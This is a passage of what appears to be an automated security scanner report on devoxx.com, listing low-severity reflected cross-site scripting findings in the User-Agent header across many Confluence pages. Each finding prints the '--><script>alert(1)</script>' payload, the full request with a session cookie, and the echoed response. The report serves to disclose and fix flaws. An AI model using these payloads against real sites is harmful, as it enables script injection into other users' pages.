userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)739cc--><script>alert(1)</script>1003ca2f40e'
layout : 'Builder Layout: DEVOXX2010'
layoutId : 'DEVOXX2010'
spaceName : 'Devoxx 2010'
currentURL : '/display/Devoxx2K10/Devoxx+2009'
contextPath : ''
action name : 'viewpage'
*
...[SNIP]...

1.28. http://devoxx.com/display/Devoxx2K10/Home [User-Agent HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://devoxx.com
Path:   /display/Devoxx2K10/Home

Issue detail

The value of the User-Agent HTTP header is copied into an HTML comment. The payload 9d682--><script>alert(1)</script>c9c2c6a7afd was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /display/Devoxx2K10/Home HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)9d682--><script>alert(1)</script>c9c2c6a7afd
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: devoxx.com
Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 17:36:32 GMT
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Confluence-Request-Time: 1289842592273
Vary: User-Agent
Content-Type: text/html;charset=UTF-8
Content-Length: 38367

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--
userAgent: 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)9d682--><script>alert(1)</script>c9c2c6a7afd'
layout : 'Builder Layout: DEVOXX2010'
layoutId : 'DEVOXX2010'
spaceName : 'Devoxx 2010'
currentURL : '/display/Devoxx2K10/Home'
contextPath : ''
action name : 'viewpage'
********
...[SNIP]...

1.29. http://devoxx.com/display/Devoxx2K10/Javaholics [User-Agent HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://devoxx.com
Path:   /display/Devoxx2K10/Javaholics

Issue detail

The value of the User-Agent HTTP header is copied into an HTML comment. The payload 76fce--><script>alert(1)</script>67136241c2d was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /display/Devoxx2K10/Javaholics HTTP/1.1
Host: devoxx.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)76fce--><script>alert(1)</script>67136241c2d
Connection: close
Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 17:41:10 GMT
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Confluence-Request-Time: 1289842870583
Content-Type: text/html;charset=UTF-8
Connection: close
Content-Length: 131050

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--
userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)76fce--><script>alert(1)</script>67136241c2d'
layout : 'Builder Layout: DEVOXX2010NSB'
layoutId : 'DEVOXX2010NSB'
spaceName : 'Devoxx 2010'
currentURL : '/display/Devoxx2K10/Javaholics'
contextPath : ''
action name : 'viewpage'

...[SNIP]...

1.30. http://devoxx.com/display/Devoxx2K10/Jboss [User-Agent HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://devoxx.com
Path:   /display/Devoxx2K10/Jboss

Issue detail

The value of the User-Agent HTTP header is copied into an HTML comment. The payload 2f7bb--><script>alert(1)</script>62282269653 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /display/Devoxx2K10/Jboss HTTP/1.1
Host: devoxx.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)2f7bb--><script>alert(1)</script>62282269653
Connection: close
Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 17:42:34 GMT
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Confluence-Request-Time: 1289842954866
Content-Type: text/html;charset=UTF-8
Connection: close
Content-Length: 35546

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--
userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)2f7bb--><script>alert(1)</script>62282269653'
layout : 'Builder Layout: DEVOXX2010NSB'
layoutId : 'DEVOXX2010NSB'
spaceName : 'Devoxx 2010'
currentURL : '/display/Devoxx2K10/Jboss'
contextPath : ''
action name : 'viewpage'
*
...[SNIP]...

1.31. http://devoxx.com/display/Devoxx2K10/News [User-Agent HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://devoxx.com
Path:   /display/Devoxx2K10/News

Issue detail

The value of the User-Agent HTTP header is copied into an HTML comment. The payload aa6a7--><script>alert(1)</script>26499719511 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /display/Devoxx2K10/News HTTP/1.1
Host: devoxx.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)aa6a7--><script>alert(1)</script>26499719511
Connection: close
Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 17:40:36 GMT
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Confluence-Request-Time: 1289842836428
Content-Type: text/html;charset=UTF-8
Connection: close
Content-Length: 38185

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--
userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)aa6a7--><script>alert(1)</script>26499719511'
layout : 'Builder Layout: DEVOXX2010'
layoutId : 'DEVOXX2010'
spaceName : 'Devoxx 2010'
currentURL : '/display/Devoxx2K10/News'
contextPath : ''
action name : 'viewpage'
********
...[SNIP]...

1.32. http://devoxx.com/display/Devoxx2K10/Newsletter [User-Agent HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://devoxx.com
Path:   /display/Devoxx2K10/Newsletter

Issue detail

The value of the User-Agent HTTP header is copied into an HTML comment. The payload f1c8f--><script>alert(1)</script>0d12e21b9d3 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /display/Devoxx2K10/Newsletter HTTP/1.1
Host: devoxx.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)f1c8f--><script>alert(1)</script>0d12e21b9d3
Connection: close
Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 17:42:52 GMT
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Confluence-Request-Time: 1289842972291
Content-Type: text/html;charset=UTF-8
Connection: close
Content-Length: 37931

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--
userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)f1c8f--><script>alert(1)</script>0d12e21b9d3'
layout : 'Builder Layout: DEVOXX2010'
layoutId : 'DEVOXX2010'
spaceName : 'Devoxx 2010'
currentURL : '/display/Devoxx2K10/Newsletter'
contextPath : ''
action name : 'viewpage'
**
...[SNIP]...

1.33. http://devoxx.com/display/Devoxx2K10/Oracle [User-Agent HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://devoxx.com
Path:   /display/Devoxx2K10/Oracle

Issue detail

The value of the User-Agent HTTP header is copied into an HTML comment. The payload 4db34--><script>alert(1)</script>867d6e034d4 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /display/Devoxx2K10/Oracle HTTP/1.1
Host: devoxx.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)4db34--><script>alert(1)</script>867d6e034d4
Connection: close
Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 17:42:44 GMT
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Confluence-Request-Time: 1289842964740
Content-Type: text/html;charset=UTF-8
Connection: close
Content-Length: 35037

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--
userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)4db34--><script>alert(1)</script>867d6e034d4'
layout : 'Builder Layout: DEVOXX2010NSB'
layoutId : 'DEVOXX2010NSB'
spaceName : 'Devoxx 2010'
currentURL : '/display/Devoxx2K10/Oracle'
contextPath : ''
action name : 'viewpage'

...[SNIP]...

1.34. http://devoxx.com/display/Devoxx2K10/Partners [User-Agent HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://devoxx.com
Path:   /display/Devoxx2K10/Partners

Issue detail

The value of the User-Agent HTTP header is copied into an HTML comment. The payload cf8ba--><script>alert(1)</script>f98f0df6c51 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /display/Devoxx2K10/Partners HTTP/1.1
Host: devoxx.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)cf8ba--><script>alert(1)</script>f98f0df6c51
Connection: close
Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 17:40:25 GMT
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Confluence-Request-Time: 1289842825985
Content-Type: text/html;charset=UTF-8
Connection: close
Content-Length: 34092

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--
userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)cf8ba--><script>alert(1)</script>f98f0df6c51'
layout : 'Builder Layout: DEVOXX2010'
layoutId : 'DEVOXX2010'
spaceName : 'Devoxx 2010'
currentURL : '/display/Devoxx2K10/Partners'
contextPath : ''
action name : 'viewpage'
****
...[SNIP]...

1.35. http://devoxx.com/display/Devoxx2K10/Practical [User-Agent HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://devoxx.com
Path:   /display/Devoxx2K10/Practical

Issue detail

The value of the User-Agent HTTP header is copied into an HTML comment. The payload ff364--><script>alert(1)</script>7b5293c13a6 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /display/Devoxx2K10/Practical HTTP/1.1
Host: devoxx.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)ff364--><script>alert(1)</script>7b5293c13a6
Connection: close
Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 17:40:36 GMT
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Confluence-Request-Time: 1289842836934
Content-Type: text/html;charset=UTF-8
Connection: close
Content-Length: 35080

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--
userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)ff364--><script>alert(1)</script>7b5293c13a6'
layout : 'Builder Layout: DEVOXX2010'
layoutId : 'DEVOXX2010'
spaceName : 'Devoxx 2010'
currentURL : '/display/Devoxx2K10/Practical'
contextPath : ''
action name : 'viewpage'
***
...[SNIP]...

1.36. http://devoxx.com/display/Devoxx2K10/Privacy+Policy [User-Agent HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://devoxx.com
Path:   /display/Devoxx2K10/Privacy+Policy

Issue detail

The value of the User-Agent HTTP header is copied into an HTML comment. The payload bfcd2--><script>alert(1)</script>4082871896 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /display/Devoxx2K10/Privacy+Policy HTTP/1.1
Host: devoxx.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)bfcd2--><script>alert(1)</script>4082871896
Connection: close
Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 17:43:05 GMT
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Confluence-Request-Time: 1289842985586
Content-Type: text/html;charset=UTF-8
Connection: close
Content-Length: 41986

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--
userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)bfcd2--><script>alert(1)</script>4082871896'
layout : 'Builder Layout: DEVOXX2010'
layoutId : 'DEVOXX2010'
spaceName : 'Devoxx 2010'
currentURL : '/display/Devoxx2K10/Privacy+Policy'
contextPath : ''
action name : 'viewpage'

...[SNIP]...

1.37. http://devoxx.com/display/Devoxx2K10/Schedule [User-Agent HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://devoxx.com
Path:   /display/Devoxx2K10/Schedule

Issue detail

The value of the User-Agent HTTP header is copied into an HTML comment. The payload 9affa--><script>alert(1)</script>0ec3a0f0447 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /display/Devoxx2K10/Schedule HTTP/1.1
Host: devoxx.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)9affa--><script>alert(1)</script>0ec3a0f0447
Connection: close
Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 17:40:36 GMT
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Confluence-Request-Time: 1289842836081
Content-Type: text/html;charset=UTF-8
Connection: close
Content-Length: 38721

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--
userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)9affa--><script>alert(1)</script>0ec3a0f0447'
layout : 'Builder Layout: DEVOXX2010NSB'
layoutId : 'DEVOXX2010NSB'
spaceName : 'Devoxx 2010'
currentURL : '/display/Devoxx2K10/Schedule'
contextPath : ''
action name : 'viewpage'

...[SNIP]...

1.38. http://devoxx.com/display/Devoxx2K10/Schedule+REST+interface [User-Agent HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://devoxx.com
Path:   /display/Devoxx2K10/Schedule+REST+interface

Issue detail

The value of the User-Agent HTTP header is copied into an HTML comment. The payload 4e81e--><script>alert(1)</script>e07c32ab7 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /display/Devoxx2K10/Schedule+REST+interface HTTP/1.1
Host: devoxx.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)4e81e--><script>alert(1)</script>e07c32ab7
Connection: close
Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 17:42:08 GMT
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Confluence-Request-Time: 1289842928576
Content-Type: text/html;charset=UTF-8
Connection: close
Content-Length: 75557

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--
userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)4e81e--><script>alert(1)</script>e07c32ab7'
layout : 'Builder Layout: DEVOXX2010NSB'
layoutId : 'DEVOXX2010NSB'
spaceName : 'Devoxx 2010'
currentURL : '/display/Devoxx2K10/Schedule+REST+interface'
contextPath : ''
action name : 'vi
...[SNIP]...

1.39. http://devoxx.com/display/Devoxx2K10/Schedules [User-Agent HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://devoxx.com
Path:   /display/Devoxx2K10/Schedules

Issue detail

The value of the User-Agent HTTP header is copied into an HTML comment. The payload 3b336--><script>alert(1)</script>4650d9ff903 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /display/Devoxx2K10/Schedules HTTP/1.1
Host: devoxx.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)3b336--><script>alert(1)</script>4650d9ff903
Connection: close
Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 17:41:45 GMT
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Confluence-Request-Time: 1289842905939
Content-Type: text/html;charset=UTF-8
Connection: close
Content-Length: 44899

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--
userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)3b336--><script>alert(1)</script>4650d9ff903'
layout : 'Builder Layout: DEVOXX2010'
layoutId : 'DEVOXX2010'
spaceName : 'Devoxx 2010'
currentURL : '/display/Devoxx2K10/Schedules'
contextPath : ''
action name : 'viewpage'
***
...[SNIP]...

1.40. http://devoxx.com/display/Devoxx2K10/Sidebar [User-Agent HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://devoxx.com
Path:   /display/Devoxx2K10/Sidebar

Issue detail

The value of the User-Agent HTTP header is copied into an HTML comment. The payload ae756--><script>alert(1)</script>b9448b28231 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /display/Devoxx2K10/Sidebar HTTP/1.1
Host: devoxx.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)ae756--><script>alert(1)</script>b9448b28231
Connection: close
Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 17:40:27 GMT
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Confluence-Request-Time: 1289842827436
Content-Type: text/html;charset=UTF-8
Connection: close
Content-Length: 34272

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--
userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)ae756--><script>alert(1)</script>b9448b28231'
layout : 'Builder Layout: DEVOXX2010'
layoutId : 'DEVOXX2010'
spaceName : 'Devoxx 2010'
currentURL : '/display/Devoxx2K10/Sidebar'
contextPath : ''
action name : 'viewpage'
*****
...[SNIP]...

1.41. http://devoxx.com/display/Devoxx2K10/Sponsors [User-Agent HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://devoxx.com
Path:   /display/Devoxx2K10/Sponsors

Issue detail

The value of the User-Agent HTTP header is copied into an HTML comment. The payload c81b5--><script>alert(1)</script>5594fe23ee7 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /display/Devoxx2K10/Sponsors HTTP/1.1
Host: devoxx.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)c81b5--><script>alert(1)</script>5594fe23ee7
Connection: close
Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 17:43:01 GMT
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Confluence-Request-Time: 1289842981133
Content-Type: text/html;charset=UTF-8
Connection: close
Content-Length: 42422

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--
userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)c81b5--><script>alert(1)</script>5594fe23ee7'
layout : 'Builder Layout: DEVOXX2010NSB'
layoutId : 'DEVOXX2010NSB'
spaceName : 'Devoxx 2010'
currentURL : '/display/Devoxx2K10/Sponsors'
contextPath : ''
action name : 'viewpage'

...[SNIP]...

1.42. http://devoxx.com/display/Devoxx2K10/Twitter [User-Agent HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://devoxx.com
Path:   /display/Devoxx2K10/Twitter

Issue detail

The value of the User-Agent HTTP header is copied into an HTML comment. The payload 29266--><script>alert(1)</script>6dfe39b9927 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /display/Devoxx2K10/Twitter HTTP/1.1
Host: devoxx.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)29266--><script>alert(1)</script>6dfe39b9927
Connection: close
Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD;

Response

